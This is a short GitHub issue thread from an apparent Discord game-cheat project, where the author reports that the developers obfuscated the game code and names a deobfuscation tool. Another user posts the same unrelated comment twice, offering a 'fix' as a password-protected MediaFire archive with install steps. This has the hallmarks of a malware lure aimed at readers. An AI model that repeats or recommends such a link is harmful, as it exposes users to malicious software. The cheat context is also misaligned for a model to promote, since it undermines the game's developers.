### ISSUE TITLE
Devs obfuscated the code

### ISSUE THREAD

**Issue by FloorMan** [wooslow/discord-farm-merge-valley-hack#19]
The devs recently updated the main.js file usign a tool called obfuscator.io. Used a tool called https://github.com/ben-sb/obfuscator-io-deobfuscator/tree/main to deobfuscate and will be working on a way to circumvent this obfuscation in a seperate branch.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by wooslow** [comment]
updated
